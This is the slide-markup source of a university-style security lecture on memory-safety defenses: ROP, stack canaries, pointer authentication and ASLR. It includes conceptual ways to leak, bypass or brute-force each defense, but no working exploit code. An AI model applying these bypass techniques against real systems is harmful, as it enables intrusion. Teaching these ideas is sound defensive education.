            <a:ext cx="3600600" cy="1366050"/>
            <a:chOff x="2474300" y="2900725"/>
            <a:chExt cx="3600600" cy="1366050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="436" name="Google Shape;436;p56"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3308900" y="2900725"/>
              <a:ext cx="27660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we jump 25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r>
                <a:rPr lang="en"/>
                <a:t> then 10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foo</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>, we get the result we want!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="437" name="Google Shape;437;p56"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="436" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2714600" y="3195175"/>
              <a:ext cx="5943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Google Shape;438;p56"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="436" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2474300" y="3424075"/>
              <a:ext cx="834600" cy="84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6" name="Google Shape;446;p57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4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5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8" name="Google Shape;448;p57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="447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49" name="Google Shape;449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3139125" y="956700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2761159" y="30019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53" name="Google Shape;453;p57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="452" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="31096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57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62" name="Google Shape;462;p58"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="461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761159" y="31608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66" name="Google Shape;466;p58"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="465" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="32685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71" name="Google Shape;471;p58"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="470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58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75" name="Google Shape;475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76" name="Google Shape;476;p58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2761159" y="33067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>
            <a:off x="3076159" y="34144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87" name="Google Shape;4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490" name="Google Shape;490;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="489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5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92" name="Google Shape;492;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="491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5" name="Google Shape;495;p59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96" name="Google Shape;496;p5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02" name="Google Shape;502;p6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03" name="Google Shape;503;p60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2761159" y="3472152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05" name="Google Shape;505;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="504" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3579852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6" name="Google Shape;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5337388" y="345416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rot="10800000" flipH="1">
            <a:off x="5756000" y="3454161"/>
            <a:ext cx="488700" cy="12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6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513" name="Google Shape;513;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="512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6" name="Google Shape;516;p60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22" name="Google Shape;522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23" name="Google Shape;523;p61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2761159" y="36180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25" name="Google Shape;525;p61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="524" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="37257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1" name="Google Shape;531;p61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="53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5317650" y="3023709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4" name="Google Shape;534;p61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5779200" y="3193059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61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6" name="Google Shape;536;p61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2761159" y="2250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44" name="Google Shape;544;p62"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="543" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="2357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50" name="Google Shape;550;p62"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="54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53" name="Google Shape;553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54" name="Google Shape;554;p62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5" name="Google Shape;555;p62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56" name="Google Shape;556;p62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62" name="Google Shape;562;p63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2761159" y="2396186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64" name="Google Shape;564;p63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="563" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="2503886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67" name="Google Shape;5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0" name="Google Shape;570;p63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="56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73" name="Google Shape;573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4" name="Google Shape;574;p63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5" name="Google Shape;575;p63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6" name="Google Shape;576;p63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safer programming languages.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82" name="Google Shape;582;p64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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="13358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84" name="Google Shape;584;p64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="583" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="14435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87" name="Google Shape;5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90" name="Google Shape;590;p64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="58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64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2" name="Google Shape;592;p64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="59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3" name="Google Shape;59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95" name="Google Shape;595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6" name="Google Shape;596;p64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02" name="Google Shape;602;p65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761159" y="1488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604" name="Google Shape;604;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="603" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="1595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5" name="Google Shape;6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5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0" name="Google Shape;610;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="60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65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2" name="Google Shape;612;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="61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3" name="Google Shape;613;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="139675" y="1253400"/>
            <a:ext cx="3289200" cy="1477500"/>
            <a:chOff x="139675" y="1253400"/>
            <a:chExt cx="3289200" cy="1477500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="614" name="Google Shape;614;p65"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="139675" y="1253400"/>
              <a:ext cx="20490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ret</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> instruction always pops off the bottom of the stack, so execution continues based on the chain of addresses!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="615" name="Google Shape;615;p65"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="2188675" y="1675650"/>
              <a:ext cx="1240200" cy="31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16" name="Google Shape;6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617" name="Google Shape;617;p65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18" name="Google Shape;618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code base is big enough (imports enough libraries), there are usually enough gadgets in memory for you to run any shellcode you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ROP compilers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> can automatically generate a ROP chain for you based on a target binary and desired malicious code!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Non-executable pages is not a huge issue for attackers nowadays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writable and executable pages makes an attacker’s life easier, but not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> much easier</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Google Shape;62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Stack Canaries</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;63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Stack canaries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640" name="Google Shape;640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641" name="Google Shape;6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Add a sacrificial value on the stack, and check if it has been changed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the program runs, generate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> secret value and save it in the canary storage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function prologue, place the canary value on the stack right below the SFP/RIP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function epilogue, check the value on the stack and compare it against the value in canary storage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canary value is never actually used by the function, so if it changes, somebody is probably attacking our system!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Google Shape;6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Properties</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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canary value is unique every time the program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>runs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> but the same for all functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>within a run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canary value uses a NULL byte as the first byte to mitigate string-based attacks (since it terminates any string before it)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 format string vulnerability with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dirty="0"/>
              <a:t> might try to print everything on the stack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null byte in the canary will mitigate the damage by stopping the print earlier.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Google Shape;6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🐦🐦🐦 canary 🐦🐦🐦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428600" y="2520050"/>
            <a:ext cx="45915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pushl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%esp,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subl $24,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($CANARY_ADDR), %eax # Load canary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%eax, -4(%ebp)       # Save on stack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-4(%ebp), %eax       # Load stack value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cmpl %eax, ($CANARY_ADDR) # Compare to canary and...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jne canary_failed         # ... crash if not equal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28600" y="1475850"/>
            <a:ext cx="2186100" cy="80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1" name="Google Shape;671;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2836350" y="1352700"/>
            <a:ext cx="3404700" cy="2245050"/>
            <a:chOff x="2836350" y="1352700"/>
            <a:chExt cx="3404700" cy="2245050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="672" name="Google Shape;672;p72"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2836350" y="1352700"/>
              <a:ext cx="24582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Because the write starts at name, the attacker has to overwrite the canary before the RIP or SFP!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="673" name="Google Shape;673;p72"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="672" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5294550" y="1876050"/>
              <a:ext cx="946500" cy="172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4" name="Google Shape;67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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="675" name="Google Shape;675;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1935325" y="2328200"/>
            <a:ext cx="3195300" cy="831300"/>
            <a:chOff x="1935325" y="2328200"/>
            <a:chExt cx="3195300" cy="831300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="676" name="Google Shape;676;p72"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2672425" y="2328200"/>
              <a:ext cx="2458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Note: 20 bytes for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/>
                <a:t> + 4 bytes for canary (32-bit architecture)</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="677" name="Google Shape;677;p72"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="676" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1935325" y="2743850"/>
              <a:ext cx="7371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Efficiency</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Google Shape;683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Compiler inserts a few extra instructions, so there is more overhead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almost all applications, the performance impact is insignificant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Very cheap way to stop lots of common attacks!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Google Shape;68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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Google Shape;690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Leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> the value of the canary: Overwrite the canary with itself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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> the value of the canary: Use a random write, not a sequential write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Guess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> the value of the canary: Brute-force</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Google Shape;69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Memory-Safe Languages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Leaking the Canary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Google Shape;697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Any vulnerability that leaks stack memory could be used to leak the canary’s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Format string vulnerabilities let you print out values on the stack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Once you learn the value of the stack canary, place it in the exploit such that the canary is overwritten with itself, so the value is unchanged!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="Google Shape;69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Bypassing the Canary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="Google Shape;704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stop attacks that write to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>increasing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>consecutive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>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stack diagram: Writing upwards, with no gaps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common functions only write this way, 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do not stop attacks that write to memory in other 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write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>around</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the canary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an attacker write to any location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Heap overflows never overwrite a stack canary (they write to the heap)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C++ vtable exploits overwrite the vtable pointer without overwriting the canary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;70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32-bit systems: 24 bits to guess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Remember that the first byte (8 bits) is always a NULL byte: 32 - 8 = 24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64-bit systems: 56 bits to guess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64 - 8 = 56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canaries are less effective on 32-bit systems since there are only 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> possibilities (~16 million), which can feasibly be brute-forced</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Google Shape;711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2" name="Google Shape;71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feasible is guessing the canary?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depends on your threat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are you running the program?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program is running on your own computer, you can keep trying with nobody to stop you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program is running on a remote server, the server might see you sending the exploit over and over and reject your requests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Does the program have a timeout?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Timeout: A mandatory waiting period after a failed request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timeout: 10,000 tries per second = 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> tries in around 30 minutes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0.1 second timeout: 10 tries per second = 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> tries in around 3 weeks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More complicated timeouts are possible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10 consecutive failures causes a 10-minute timeout: 1 try per minute = 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> tries in ~32 years!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Exponentially growing timeout (the timeout doubles for each failure): 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> tries is not happening</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Google Shape;718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9" name="Google Shape;71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Pointer Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="725" name="Google Shape;72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Mitigation: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Pointer authentication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32" name="Google Shape;73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33" name="Google Shape;73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32-Bit and 64-Bit Processors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="739" name="Google Shape;739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658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32-bit processor: integers and pointers are 32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32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bytes ≈ 4 GB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64-bit processor: integers and pointers are 64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64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bytes ≈ 18 exabytes ≈ 18 billion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modern computer can support this much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best most modern computers only need 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bytes ≈ 4 terabytes ≈ 4000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most 42 bits are needed to address all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bits are left unused (the top 22 bits in the address are always 0)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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Google Shape;746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stack canaries: A secret value stored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secret value changes, detect an attack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One canary per function on the stack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Instead of placing the secret value below the pointer, store a value in the pointer itself!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Use the unused bits in a 64-bit address to store a secret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storing a pointer in memory, replace the unused bits with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>pointer authentication code (PAC)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Before using the pointer in memory, check if the PAC is still valid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PAC is invalid, crash the program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the PAC is valid, restore the unused bits and use the address normally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Includes the RIP, SFP, any other pointers on the stack, and any other pointers outside of the stack (e.g. on the heap)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747" name="Google Shape;74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Authentication: Properties of the PAC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Google Shape;7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possible address has its own PAC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The PAC for the address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0x000000007ffffec0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> is different from the PAC for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0x000000007ffffec4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an attacker changes the address without changing the PAC, the PAC will no longer be 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someone who knows the CPU’s master secret can generate a PAC for an address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cannot generate a PAC for their malicious pointer without the master secret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cannot generate a PAC using a PAC for a different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CPU’s master secret is not accessible to the program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Leaking program memory will not leak the master secret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Contrast with canaries, which can be leaked</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754" name="Google Shape;75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Pointer Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Google Shape;760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a vulnerability to trick the program to generating a PAC for any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Learn the master secret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operating system has to set up the secrets: What if there is a vulnerability in the OS?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Workaround: Embed the master secret in the CPU, which can only be used to generate PACs, never read directly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Guess a PAC: Brute-force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 64-bit systems use 48 bits for addressing, so there are only 22 bits left for the PAC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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000" dirty="0"/>
              <a:t>22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> bits ≈ 4 million possibilities, so possibly feasible depending on your threat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 reuse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CPU already generated another PAC for another pointer, we can copy that pointer and use it elsewhere</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761" name="Google Shape;76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safer programming languages.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 Against Pointer Reuse</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="767" name="Google Shape;767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usually multiple master secrets for different types of pointers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uses 5 master secrets: 2 instruction pointer secrets (IA and IB), 2 data pointer secrets (DA and DB), and 1 general-purpose secret (GA)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pointer secrets are used for pointers to machine instructions (e.g. RIP)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 secrets are used for pointers to data (e.g. local variables)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pointers can’t be reused as instruction pointers, and vice-versa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generate a unique PAC for each pointer and “context”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Context: usually the address where the pointer is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pointer will have a different PAC depending on where in memory it's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copies a pointer and PAC to a different location, the PAC is no longer valid!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="Google Shape;768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 on ARM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="Google Shape;774;p8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authentication is supported by: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8.3 (a new architecture, like x86 or RISC-V)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Apple chips (starting with the A12 and including the new M1), which use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on ARM (operating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biggest benefit for Apple going to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advantage of the more efficient instructions instead of backwards-compatible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in both standard user programs and kernel programs (privileged code run by the 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has not developed a similar defense</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="775" name="Google Shape;77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Address Space Layout Randomization (ASLR)</a:t>
            </a:r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Address-space layout randomization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Stack canaries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Pointer authentication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90" name="Google Shape;79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796" name="Google Shape;796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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="797" name="Google Shape;797;p89"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="798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89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799" name="Google Shape;799;p89"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="800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89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01" name="Google Shape;801;p89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2" name="Google Shape;802;p89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03" name="Google Shape;803;p89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89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10" name="Google Shape;8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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="811" name="Google Shape;811;p90"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="812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90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13" name="Google Shape;813;p90"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="814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90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15" name="Google Shape;815;p90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" name="Google Shape;816;p90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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="Google Shape;817;p90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18" name="Google Shape;818;p90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9" name="Google Shape;819;p90"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="820" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="50645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90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44382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21" name="Google Shape;821;p90"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="822" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50645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90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44382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23" name="Google Shape;823;p90"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5690750" y="1221150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4" name="Google Shape;824;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="43681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...but in practice, it usually looks like this (mostly empty)!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30" name="Google Shape;830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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="831" name="Google Shape;831;p91"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="832" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2074600" y="15323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91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448350" y="11936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33" name="Google Shape;833;p91"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="834" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074600" y="32498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4" name="Google Shape;834;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448350" y="37955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35" name="Google Shape;835;p91"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4804675" y="1193663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6" name="Google Shape;836;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528550" y="4360950"/>
            <a:ext cx="4086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Put each segment of memory in a different location each time the program is run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91"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2817000" y="1193675"/>
          <a:ext cx="1522325" cy="29281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843" name="Google Shape;843;p9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Address space layout randomization (ASLR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: Put each segment of memory in a different location each time the program is run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can’t know where their shellcode will be because its address changes every time you run the program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can shuffle all four segments of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stack: Can’t place shellcode on the stack without knowing the address of the stack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heap: Can’t place shellcode on the heap without knowing the address of the heap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Randomize the code: Can’t construct a ROP chain or return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> attack without knowing the address of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Within each segment of memory, relative addresses are the same (e.g. the RIP is always 4 bytes above the SFP)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Google Shape;84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ASLR: Efficiency</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850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Programs are dynamically linked at runtime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already have to do the work of going through the executable and rewriting code to contain known addresses before executing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has effectively no overhead, since we have to do relocation anyway!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Google Shape;85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ASLR</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="857" name="Google Shape;857;p9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the address of a pointer, whose address relative to your shellcode is known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addresses are usually fixed, so this is sufficient to undo randomization!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 stack pointer: Leak the location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an RIP: Leak the location of the caller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address of your shellcode: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usually happens on page boundaries (usually 12 bits for 4 KiB pages)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32-bit: 32 - 12 = 20 bits, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> possible pages, which is feasibly brute-forced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(usually 48-bit addressing): 48 - 12 = 36 bits, 2</a:t>
            </a:r>
            <a:r>
